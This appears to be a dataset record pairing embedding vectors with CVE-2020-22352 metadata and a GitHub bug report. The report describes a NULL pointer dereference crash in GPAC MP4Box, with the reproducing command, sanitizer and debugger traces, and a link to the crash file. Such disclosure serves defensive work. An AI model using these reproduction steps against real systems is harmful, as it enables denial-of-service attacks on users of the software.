-0.0045145852491259575, 0.009822944179177284, -0.0006122803315520287, -0.011847065761685371, 0.009604656137526035, 0.005688708275556564, -0.014089475385844707, -0.004531122278422117, -0.0030229531694203615, -0.03497894108295441, -0.004415363539010286, -0.0008061759872362018, -0.017238108441233635, -0.02741163596510887, 0.0012832668144255877, 0.011668466962873936, 0.012713601812720299, 0.012277026660740376, -0.034264545887708664, 0.01003461703658104, 0.017171962186694145, 0.00966418907046318, 0.005615945905447006, -0.005344740115106106, 0.01592838391661644, -0.025850549340248108, 0.014142394065856934, -0.019473904743790627, 0.021683240309357643, -0.015796087682247162, 0.006069058086723089, 0.0029865719843655825, 0.01356029324233532, 0.01234317384660244, -0.005156219005584717, 0.006671002600342035, -0.002996494062244892, -0.005189292598515749, -0.024276232346892357, -0.006538707297295332, -0.010239674709737301, -0.0030775251798331738, 0.0016090444987639785, 0.0044285934418439865, 0.013719047419726849, -0.015637332573533058, -0.021206974983215332, -0.013573522679507732, -0.019222542643547058, -0.007018278818577528, -0.014433443546295166, -0.0016999976942315698, 0.0046931845135986805, -0.013573522679507732, -0.003173439297825098, -0.006006217561662197, -0.008896875195205212, 0.012415937148034573, -0.006207968574017286, 0.026829537004232407, 0.020902695134282112, 0.005764778237789869, 0.028708133846521378, -0.0218949131667614, -0.004292990546673536, 0.009836173616349697, 0.001875289366580546, -0.011668466962873936, -0.022199193015694618, -0.0007069543353281915, 0.009783255867660046, -0.016100367531180382, 0.006449407897889614, 0.00010180555545957759, 0.019791413098573685, -0.003502524457871914, -0.003117213724181056, -0.0024292769376188517, 0.007792207412421703, 0.008400767110288143, -0.00896963756531477, -0.006181509234011173, -0.01103344839066267, 0.014129163697361946, 0.02140541933476925, 0.012442396022379398, 0.002981610829010606, 0.023006195202469826, 0.004531122278422117, -0.0008632284007035196, 0.015650562942028046, 0.008043569512665272, 0.015385971404612064, -0.025202300399541855, 0.003328886581584811, 0.024884792044758797, -0.014486362226307392, 0.017291028052568436, 0.017224879935383797, -0.01033889688551426, -0.025017086416482925, 0.014790642075240612, -0.0047130286693573, -0.006601547822356224, -0.009498819708824158, 0.008063413202762604, 0.011589089408516884, -0.005801159422844648, 0.0013320507714524865, 0.0009533547563478351, -0.008956408128142357, 0.006330341566354036, 0.011178973130881786, 0.002829470904543996, 0.009928780607879162, 0.0005792064475826919, 0.013970409519970417, 0.005510109476745129, -0.01100037433207035, -0.01543889008462429, 0.01069609448313713, -0.006657773163169622, -0.0014693073462694883, -0.015822546556591988, -0.003753886092454195, -0.011311269365251064, 0.01823032647371292, -0.014499591663479805, 0.010233060456812382, 0.018455227836966515, 0.004048243630677462, 0.01249531377106905, -0.01349414512515068, -0.011661851778626442, 0.013785195536911488, 0.01598130166530609, 0.002545035444200039, 0.014949396252632141, -0.0004258262924849987, -0.005252133123576641, -0.008903490379452705, 0.01787312887609005, 0.00034396842238493264, -0.0025615724734961987, -0.007606993895024061, -0.017714373767375946, -0.009703878313302994, -0.01860075257718563, 0.010973915457725525, 0.021656779572367668, -0.0038266486953943968, -0.032676998525857925, 0.008070028387010098, -0.015584414824843407, 0.019103476777672768, -0.006786761339753866, -0.016867682337760925, -0.022543160244822502, -0.01623266376554966, 0.01666923798620701, 0.007329172920435667, 0.01562410406768322, -0.02176261693239212, -0.002123343525454402, 0.017661454156041145, 0.030613189563155174, -0.010160298086702824, 0.01310387346893549, 0.0004576598876155913, 0.019394526258111, 0.0028542764484882355, 0.00017353454313706607, 0.012138116173446178, 0.0056093311868608, 0.02030736580491066, 0.005834233481436968, -0.004825479816645384, 0.0072497958317399025, -0.0029882255475968122, 0.012019050307571888, 0.007071197032928467, 0.01440698467195034, -0.013454456813633442, 0.00278812856413424, -0.013917490839958191, -0.008189094252884388, 0.008294930681586266, -0.014301148243248463, 0.015081691555678844, -0.005735011771321297, -0.008943178690969944, 0.0045046634040772915, 0.018018653616309166, 0.020082464441657066, -0.015941612422466278, -0.02262253873050213, 0.028787510469555855, -0.012872355990111828, 0.018098030239343643, -0.01817740686237812, 0.01606067828834057, 0.0032098207157105207, 0.0048817056231200695, -0.018071571364998817, 0.038630299270153046, 0.006866138894110918, -0.015333053655922413, 0.009551738388836384, 0.014698035083711147, 0.006671002600342035, 0.0013237822568044066, -0.028417082503437996, 0.03069256618618965, -0.017357176169753075, 0.00954512320458889, -0.002925385255366564, -0.03902718424797058, 0.00632041972130537, 0.005417502485215664, 0.0000638739438727498, 0.0059400699101388454, -0.0009707185672596097, 0.022265339270234108, 0.0011162436567246914, -0.010067691095173359, 0.014512821100652218, 0.006442793179303408, 0.013970409519970417, -0.008341234177350998, 0.02432915009558201, 0.006502326112240553, 0.014129163697361946, -0.017542388290166855, 0.008910104632377625, 0.0010203294223174453, 0.02096884325146675, -0.020638104528188705, 0.02492448128759861, 0.017277797684073448, 0.007977421395480633, -0.011165743693709373, 0.008433841168880463, -0.008400767110288143, -0.01956651173532009, -0.004643573425710201, 0.028734592720866203, -0.002821202389895916, 0.005066919140517712, 0.009042400866746902, -0.01575639843940735, 0.017251338809728622, 0.0074746981263160706, 0.0285758376121521, 0.005754855927079916, 0.013613210991024971, 0.009141622111201286, 0.007031508255749941, -0.006522170267999172, 0.018825655803084373, -0.007157188840210438, -0.015425660647451878, -0.01559764426201582, -0.0062675015069544315, 0.005672171246260405, 0.02620774693787098, 0.01218441966921091, -0.01721164956688881, -0.0044021341018378735, 0.02182876504957676, 0.013547063805162907, -0.01440698467195034, 0.020863007754087448, -0.0005874749040231109, -0.007573919836431742, 0.004206998273730278, 0.005804467014968395, 0.02335016429424286, 0.011582475155591965, 0.009598041884601116, -0.0028112803120166063, 0.008949793875217438, -0.004306219983845949, 0.0022209114395081997, -0.008797653950750828, 0.004888320341706276, -0.013877802528440952, 0.0003158556064590812, -0.009591426700353622, 0.007884814403951168, -0.009723722003400326, -0.013262628577649593, -0.004081317689269781, -0.01902409829199314, -0.01517429854720831, 0.008070028387010098, -0.01897118054330349, -0.024289462715387344, 0.013540448620915413, -0.0014081207336857915, 0.010444733314216137, -0.03479372709989548, -0.0004190047911833972, -0.0021663394290953875, 0.01061010267585516, -0.02820540964603424, 0.0023300552275031805, -0.008056798949837685, 0.0049180868081748486, -0.0024855025112628937, -0.004484818782657385, 0.012171190232038498, -0.012713601812720299, -0.020717483013868332, -0.015028773806989193, 0.0018041804432868958, -0.007110885344445705, -0.02414393611252308, 0.016338499262928963, 0.010967300273478031, -0.009452516213059425, -0.018561065196990967, -0.008480144664645195, 0.01878596656024456, -0.010113994590938091, 0.004335986450314522, 0.010312438011169434, -0.005281899590045214, 0.004309527110308409, -0.0014651730889454484, -0.001886865240521729, 0.00428637582808733, 0.012151345610618591, 0.001911670551635325, 0.030136924237012863, 0.011384031735360622, -0.00425660889595747, 0.0034760653506964445, -0.022397635504603386, 0.003565364982932806, 0.004570811055600643, -0.0033272330183535814, -0.008466915227472782, 0.019394526258111, 0.006859523709863424, 0.003720812266692519, 0.005278591997921467, 0.012931889854371548, -0.009988313540816307, 0.025241989642381668, -0.01988402009010315, -0.013930721208453178, 0.019407756626605988, 0.003866337239742279, 0.003810111666098237, 0.0009401252027601004, -0.009710492566227913, -0.014856789261102676, 0.016140056774020195, 0.009895706549286842, -0.011694925837218761, 0.002412739908322692, 0.008771194145083427, -0.0040978542529046535, -0.00011100422852905467, -0.017489470541477203, -0.009670804254710674, -0.0022209114395081997, 0.019129935652017593, 0.008585981093347073, 0.006465944927185774, -0.010206601582467556, 0.0020505809225142, 0.019420985132455826, -0.0049974643625319, -0.007540845777839422, -0.004908164497464895, 0.018137719482183456, -0.006601547822356224, 0.0022606002166867256, 0.0036050535272806883, 0.015610873699188232, -0.027808522805571556, 0.0037274269852787256, -0.0017975657247006893, 0.008777809329330921, -0.0008789385319687426, 0.0045145852491259575, 0.020902695134282112, -0.011251736432313919, -0.017740832641720772, -0.001967896241694689, 0.0018901725998148322, -0.0027616694569587708, -0.014671576209366322, -0.023760279640555382, -0.0021580711472779512, 0.016827993094921112, -0.023482458665966988, 0.04249332845211029, 0.004140850622206926, -0.008036954328417778, 0.00911516323685646, -0.010920996777713299, 0.00454435171559453, 0.01611359789967537, 0.004335986450314522, -0.014922937378287315, 0.0032395871821790934, -0.016126826405525208, 0.0018521376186981797, 0.012568077072501183, 0.003866337239742279, 0.005493572447448969, 0.006661080755293369, 0.011026833206415176, 0.010398429818451405, -0.02741163596510887, -0.0025185763370245695, -0.026855995878577232, -0.012865741737186909, 0.003962251357734203, -0.004431900568306446, -0.003413225058466196, 0.0006193084991537035, 0.02414393611252308, 0.005963221658021212, 0.02061164565384388, -0.027993736788630486, 0.020691022276878357, -0.0020505809225142, -0.0011236852733418345, -0.024461446329951286, 0.008010495454072952, 0.019712036475539207, -0.010987144894897938, 0.019844330847263336, -0.002457389608025551, -0.016827993094921112, 0.016457565128803253, 0.0117610739544034, -0.012303485535085201, 0.00103355897590518, 0.01015368290245533, 0.00542411720380187, 0.0032032057642936707, -0.006403104402124882, 0.007183648180216551, -0.005391043610870838, -0.005953299347311258, -0.0054108877666294575, 0.005893766414374113, -0.0032445481047034264, -0.0010037923930212855, -0.0064196414314210415, -0.006538707297295332, -0.014962625689804554, -0.009135006926953793, -0.0025814168620854616, -0.013170021586120129, -0.0114898681640625, -0.001855444977991283, 0.01628558151423931, -0.004054858349263668, 0.013957180082798004, 0.016735386103391647, 0.026657551527023315, -0.010127224028110504, -0.0055497982539236546, 0.007342402823269367, -0.0008144444436766207, -0.007315943483263254, -0.008189094252884388, 0.012263797223567963, -0.020624876022338867, 0.020148610696196556, 0.006723920814692974, -0.013705817982554436, 0.007633452769368887, 0.005735011771321297, -0.01054395455867052, 0.003170131938531995, 0.00674707256257534, -0.01927546039223671, -0.013904261402785778, -0.019500363618135452, -0.01628558151423931, -0.0015552995027974248, 0.01987079158425331, 0.015002314932644367, 0.02061164565384388, -0.010689480230212212, -0.006102132145315409, -0.008341234177350998, 0.014698035083711147, -0.01103344839066267, -0.002391241956502199, 0.013652900233864784, 0.00896963756531477, -0.01513461023569107, -0.011833836324512959, 0.004789098631590605, -0.012931889854371548, 0.000003300928938188008, -0.020889466628432274, -0.02656494453549385, -0.024461446329951286, -0.0019133243476971984, -0.0013130332808941603, -0.0030394901987165213, -0.0027616694569587708, -0.021140828728675842, 0.0029915329068899155, -0.023442769423127174, -0.017052896320819855, -0.003370228921994567, 0.002981610829010606, 0.003522368846461177, 0.019063787534832954, -0.020863007754087448, 0.010464577935636044, 0.0007565651321783662, 0.006062443368136883, -0.003522368846461177, 0.004623729269951582, 0.003204859560355544, 0.00647255964577198, -0.02159063331782818, 0.006333649158477783, 0.0013767004711553454, -0.01895795203745365, -0.007335788104683161, 0.02029413729906082, 0.02626066468656063, 0.030719025060534477, 0.0048817056231200695, 0.005490264855325222, 0.0358520932495594, -0.008427225984632969, -0.010934227146208286, 0.03696337342262268, -0.010742397978901863, 0.01513461023569107, -0.030613189563155174, 0.0129848076030612, 0.007924502715468407, 0.002596300095319748, 0.005844155792146921, -0.010206601582467556, 0.012356404215097427, 0.0003937859437428415, 0.025678565725684166, -0.018031882122159004, -0.00354221323505044, 0.01483033038675785, 0.002960112877190113, -0.005705245304852724, -0.005668864119797945, 0.003697660518810153, 0.0218949131667614, -0.019725264981389046, -0.011443564668297768, 0.000023565144147141837, 0.0173836350440979, 0.008526448160409927, 0.0020522347185760736, -0.013170021586120129, 0.01520075835287571, -0.00428637582808733, -0.003714197315275669, -0.01014706864953041, 0.010206601582467556, 0.0048453244380652905, 0.010219831019639969, -0.0015131302643567324, 0.009280532598495483, 0.010199986398220062, 0.010431503877043724, 0.004908164497464895, -0.0056754788383841515, -0.00603598402813077, -0.00691244238987565, 0.005721782334148884, -0.018918262794613838, 0.005705245304852724, -0.011754458770155907, -0.0029105020221322775, 0.0018901725998148322, -0.01118558831512928, 0.009690648876130581, -0.00957158301025629, 0.009551738388836384, -0.019010869786143303, -0.005129759665578604, -0.003935792483389378, -0.00484863156452775, -0.014354066923260689, 0.01768791489303112, -0.0025351133663207293, -0.01853460632264614, -0.03762485086917877, 0.005513416603207588, 0.042757920920848846 ]
1,668
CVE-2020-22352
2021-08-04T21:15:08.033000
The gf_dash_segmenter_probe_input function in GPAC v0.8 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1423
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ System info: Ubuntu 18.04.6 LTS, X64, gcc version 7.4.0, gpac (latest master 4a7a63) Compile Command: ```asm $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ```asm ./MP4Box -dash 1000 crash_3 ``` ASAN info: ```asm ================================================================= ==13768==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x562656a3daf0 bp 0x000000000001 sp 0x7ffee325fef0 T0) ==13768==The signal is caused by a READ memory access. ==13768==Hint: address points to the zero page. #0 0x562656a3daef in gf_dash_segmenter_probe_input media_tools/dash_segmenter.c:5264 #1 0x562656a6350a in gf_dasher_add_input media_tools/dash_segmenter.c:6669 #2 0x56265663ea6f in mp4boxMain /home/dr3dd/fuzzing/gpac/applications/mp4box/main.c:4704 #3 0x7fab411e9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x56265662d7a9 in _start (/home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box+0x1657a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/dash_segmenter.c:5264 in gf_dash_segmenter_probe_input ==13768==ABORTING ``` gdb info: ```asm (gdb) r -dash 1000 ~/gpac_poc/crash_3 Starting program: /home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box -dash 1000 ~/gpac_poc/crash_2 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x0000555555bf408c in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5264 5264 if (esd && (esd->decoderConfig->objectTypeIndication == GPAC_OTI_VIDEO_HEVC || esd->decoderConfig->objectTypeIndication == GPAC_OTI_VIDEO_LHVC)) { (gdb) bt #0 0x0000555555bf408c in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5264 #1 0x0000555555c2dabb in gf_dasher_add_input (dasher=0x5555562c4970, input=<optimized out>) at media_tools/dash_segmenter.c:6669 #2 0x00005555555c88f5 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:4704 #3 0x00007ffff722bb97 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #4 0x00005555555a3e0a in _start () at main.c:5985 (gdb) ``` Here is crash file: [crash_3.zip](https://github.com/gpac/gpac/files/4272293/crash_3.zip) Thanks dr3dd
AddressSanitizer: NULL pointer dereference in media_tools/dash_segmenter.c:5264 in gf_dash_segmenter_probe_input
https://api.github.com/repos/gpac/gpac/issues/1423/comments
1
2020-03-01T19:19:26
2020-06-11T17:19:33Z
https://github.com/gpac/gpac/issues/1423
573,599,771
1,423
true
This is a GitHub Issue repo:gpac owner:gpac Title : AddressSanitizer: NULL pointer dereference in media_tools/dash_segmenter.c:5264 in gf_dash_segmenter_probe_input Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ System info: Ubuntu 18.04.6 LTS, X64, gcc version 7.4.0, gpac (latest master 4a7a63) Compile Command: ```asm $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ```asm ./MP4Box -dash 1000 crash_3 ``` ASAN info: ```asm ================================================================= ==13768==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x562656a3daf0 bp 0x000000000001 sp 0x7ffee325fef0 T0) ==13768==The signal is caused by a READ memory access. ==13768==Hint: address points to the zero page. #0 0x562656a3daef in gf_dash_segmenter_probe_input media_tools/dash_segmenter.c:5264 #1 0x562656a6350a in gf_dasher_add_input media_tools/dash_segmenter.c:6669 #2 0x56265663ea6f in mp4boxMain /home/dr3dd/fuzzing/gpac/applications/mp4box/main.c:4704 #3 0x7fab411e9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x56265662d7a9 in _start (/home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box+0x1657a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/dash_segmenter.c:5264 in gf_dash_segmenter_probe_input ==13768==ABORTING ``` gdb info: ```asm (gdb) r -dash 1000 ~/gpac_poc/crash_3 Starting program: /home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box -dash 1000 ~/gpac_poc/crash_2 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x0000555555bf408c in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5264 5264 if (esd && (esd->decoderConfig->objectTypeIndication == GPAC_OTI_VIDEO_HEVC || esd->decoderConfig->objectTypeIndication == GPAC_OTI_VIDEO_LHVC)) { (gdb) bt #0 0x0000555555bf408c in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5264 #1 0x0000555555c2dabb in gf_dasher_add_input (dasher=0x5555562c4970, input=<optimized out>) at media_tools/dash_segmenter.c:6669 #2 0x00005555555c88f5 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:4704 #3 0x00007ffff722bb97 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #4 0x00005555555a3e0a in _start () at main.c:5985 (gdb) ``` Here is crash file: [crash_3.zip](https://github.com/gpac/gpac/files/4272293/crash_3.zip) Thanks dr3dd --- end body ---
3,560
[ -0.032308343797922134, 0.034207165241241455, -0.015063056722283363, -0.0012213049922138453, 0.029927728697657585, 0.00034451604005880654, -0.03712625429034233, 0.04718718305230141, -0.010691510513424873, 0.0069009484723210335, -0.03239336609840393, 0.0028624057304114103, 0.018336402252316475, -0.0019643614068627357, 0.006479381583631039, -0.0021113785915076733, -0.03811817616224289, 0.028779931366443634, -0.01706107147037983, -0.0005265161744318902, 0.039903637021780014, -0.02036275900900364, -0.02083037979900837, 0.03746633976697922, -0.009161115624010563, 0.028269799426198006, -0.020022669807076454, 0.011442538350820541, -0.006585658993571997, 0.02533654309809208, 0.0012133341515436769, 0.010677340440452099, 0.0015312808100134134, 0.022134048864245415, 0.06087572127580643, -0.00645812600851059, 0.04800906404852867, 0.047697316855192184, 0.013426383957266808, 0.019781773909926414, -0.0038295304402709007, -0.04395635053515434, -0.029644321650266647, 0.004743516445159912, -0.01703273132443428, -0.00041426060488447547, 0.0044955359771847725, 0.023366866633296013, -0.03579424321651459, 0.0008719178731553257, 0.030154453590512276, 0.0029899387154728174, -0.015063056722283363, -0.07011476904153824, 0.005083604250103235, -0.035142406821250916, 0.030239475890994072, 0.021850641816854477, -0.009897972457110882, 0.03831655904650688, 0.006939916871488094, 0.012094372883439064, -0.012753292918205261, 0.03097633272409439, 0.011740114539861679, 0.017358649522066116, -0.001276214956305921, 0.03959188982844353, -0.017457840964198112, 0.03131641820073128, 0.014538753777742386, -0.0425109788775444, 0.006018845830112696, 0.037749748677015305, 0.011527559719979763, -0.019328324124217033, 0.016395067796111107, 0.038968395441770554, -0.02060365304350853, 0.020221054553985596, -0.0426243394613266, 0.031146375462412834, -0.03259174898266792, 0.017642054706811905, 0.020518632605671883, 0.02037692815065384, -0.030636243522167206, -0.06954795867204666, -0.03284681588411331, -0.04361626133322716, 0.006638797465711832, 0.01660762168467045, 0.025719141587615013, -0.0010521466610953212, 0.003220206592231989, 0.018364742398262024, -0.028085585683584213, -0.004049170762300491, -0.054414052516222, -0.0047258036211133, -0.050531379878520966, -0.012739122845232487, -0.012724952772259712, 0.02581833302974701, 0.01276746392250061, 0.005756694823503494, 0.011570070870220661, -0.035170748829841614, 0.0307496078312397, 0.12413205206394196, 0.007060364820063114, -0.00900524202734232, -0.0021786876022815704, -0.01608332060277462, 0.005473288241773844, 0.02553492784500122, -0.014524583704769611, -0.012278587557375431, -0.04472154751420021, -0.022403284907341003, 0.022672520950436592, -0.02389116957783699, -0.027391240000724792, 0.03330026566982269, -0.02083037979900837, 0.06699729710817337, -0.019129939377307892, 0.002704760991036892, -0.03120305761694908, -0.011803881265223026, -0.02955929934978485, -0.013808982446789742, -0.007010768633335829, -0.02177979052066803, 0.009416181594133377, -0.0006717619835399091, -0.040555473417043686, 0.0332152433693409, 0.02203485742211342, 0.025464074686169624, -0.06183930113911629, -0.02601671777665615, 0.04307778924703598, 0.013681449927389622, -0.025704970583319664, -0.004545132163912058, 0.00910443440079689, 0.01920079067349434, -0.01313589233905077, -0.012476971372961998, -0.016140000894665718, 0.0054662032052874565, 0.013823152519762516, 0.01301544439047575, 0.06569363176822662, 0.024670537561178207, -0.0013204972492530942, 0.031174717471003532, -0.01089698076248169, -0.0036028053145855665, 0.010174294002354145, -0.02251664735376835, -0.0106277447193861, -0.03638939559459686, -0.015303951688110828, -0.013624767772853374, 0.009770439937710762, 0.003847243497148156, -0.004251097794622183, 0.020391099154949188, 0.0018722543027251959, -0.014028622768819332, 0.03437720984220505, 0.020306076854467392, -0.06461668759584427, -0.03239336609840393, 0.006054271478205919, 0.043219491839408875, -0.012880826368927956, -0.015785742551088333, -0.020688675343990326, 0.0031174717005342245, -0.008700580336153507, -0.01608332060277462, 0.00912568997591734, -0.02936091460287571, 0.013539746403694153, -0.05260024964809418, 0.014255347661674023, 0.00005626615529763512, 0.0034487030934542418, -0.00437863077968359, -0.03174152970314026, -0.0009175285813398659, 0.034887343645095825, -0.010889895260334015, -0.021581405773758888, -0.009628736414015293, -0.007963723503053188, -0.004290066193789244, -0.01218647975474596, -0.016154171898961067, 0.01003967598080635, -0.011052854359149933, -0.032818473875522614, 0.004396343603730202, -0.01489301212131977, 0.055717721581459045, 0.0073969098739326, -0.019356664270162582, -0.019087428227066994, -0.03171318769454956, 0.018605638295412064, -0.007779508829116821, -0.011421282775700092, 0.004304236266762018, -0.0002482021227478981, 0.013355531729757786, -0.0069824280217289925, 0.0043325768783688545, 0.01818052865564823, 0.0048993900418281555, 0.021241318434476852, -0.010925320908427238, -0.03925180062651634, 0.0005136742838658392, 0.006784043274819851, 0.004162533208727837, -0.028283970430493355, 0.0030200507026165724, -0.001560507109388709, -0.006433327682316303, 0.008275470696389675, 0.016536770388484, 0.01796797290444374, 0.0295876394957304, 0.0028057245071977377, -0.005338670220226049, -0.011584240943193436, 0.035822585225105286, -0.013568086549639702, 0.039676912128925323, -0.033697035163640976, -0.012724952772259712, 0.002795096719637513, 0.05410230532288551, -0.009253222495317459, -0.006904491223394871, -0.00721269566565752, -0.007899956777691841, -0.01917245052754879, -0.025223180651664734, 0.0015250813448801637, -0.027277877554297447, -0.013171317987143993, -0.008176278322935104, 0.010889895260334015, 0.005455575417727232, -0.0041412776336073875, -0.026356805115938187, 0.02390533871948719, -0.005944451782852411, -0.021708939224481583, 0.005873600021004677, 0.006100325379520655, -0.029530959203839302, -0.019569220021367073, 0.018860703334212303, 0.01004676055163145, -0.03483065962791443, 0.012987103313207626, -0.01183222234249115, -0.027504602447152138, -0.04432477802038193, -0.013440554030239582, -0.013390958309173584, 0.007177270017564297, 0.002885432681068778, -0.007389824837446213, 0.0014976263046264648, 0.014156155288219452, 0.015559017658233643, -0.011152046732604504, 0.02176561951637268, -0.007163099478930235, -0.0056787580251693726, 0.004240470007061958, 0.005650417413562536, -0.008261299692094326, 0.016536770388484, 0.02553492784500122, 0.03145812451839447, -0.054414052516222, 0.03188323229551315, 0.022856734693050385, 0.03296017646789551, 0.00982003565877676, -0.010379763320088387, -0.00478602759540081, 0.012788718566298485, -0.006181804463267326, -0.003384936600923538, -0.003044848795980215, -0.009146945551037788, -0.01938500627875328, 0.002947427798062563, -0.05639789626002312, 0.00668130861595273, -0.022162389010190964, -0.006939916871488094, 0.04185914248228073, -0.04781067743897438, -0.037012889981269836, -0.0001470171264372766, -0.004598270636051893, -0.013369702734053135, 0.003287515603005886, -0.038259878754615784, 0.001356808701530099, 0.016196683049201965, -0.017840439453721046, -0.008509280160069466, -0.035340793430805206, 0.009090264327824116, 0.0016340157017111778, -0.012533653527498245, -0.0100680161267519, 0.010861555114388466, -0.07980727404356003, 0.021496383473277092, 0.004902932792901993, 0.002316848374903202, -0.0041412776336073875, -0.03627603501081467, 0.02321099303662777, -0.03355533257126808, -0.000799737754277885, 0.01442539133131504, 0.02978602424263954, 0.006125123240053654, -0.010401018895208836, 0.022601669654250145, 0.0009192998986691236, 0.003454016987234354, -0.010556892491877079, -0.009288648143410683, 0.0064120725728571415, -0.009685417637228966, -0.0026693351101130247, -0.017882950603961945, 0.0009556113509461284, 0.017882950603961945, 0.011407112702727318, 0.015913276001811028, -0.006606914568692446, -0.010337253101170063, -0.009359500370919704, -0.010486041195690632, 0.0044955359771847725, -0.0028376076370477676, 0.0026764203794300556, -0.02984270639717579, -0.032308343797922134, 0.039676912128925323, 0.005661045201122761, 0.017103582620620728, -0.014085303992033005, -0.020164374262094498, -0.0055724806152284145, -0.015799913555383682, -0.03627603501081467, 0.030919650569558144, -0.04143403097987175, -0.0002834065235219896, -0.006323507986962795, -0.014035707339644432, -0.0007647547754459083, 0.011520475149154663, -0.05532095208764076, 0.017443671822547913, -0.02458551526069641, 0.023239335045218468, 0.025152327492833138, -0.052203480154275894, 0.025931695476174355, 0.029530959203839302, -0.008629728108644485, 0.050984833389520645, -0.01751452311873436, -0.03817485645413399, -0.04086722061038017, 0.038259878754615784, -0.044409800320863724, -0.04846251383423805, -0.024925602599978447, -0.0023239334113895893, -0.016862688586115837, -0.017684565857052803, 0.029672661796212196, -0.04786736145615578, 0.020235225558280945, -0.00851636566221714, -0.015006374567747116, 0.03638939559459686, -0.0010982002131640911, 0.02766047604382038, 0.006008218042552471, -0.014035707339644432, 0.04338953644037247, 0.0007616549846716225, 0.017344478517770767, -0.03500070422887802, -0.010011334903538227, -0.006511264480650425, 0.030664585530757904, 0.014963864348828793, -0.020306076854467392, -0.002656936179846525, -0.05489584058523178, 0.026640212163329124, -0.008027489297091961, 0.004456567578017712, 0.016536770388484, 0.021581405773758888, 0.029006656259298325, 0.044863250106573105, -0.03500070422887802, 0.020263565704226494, 0.03619101271033287, 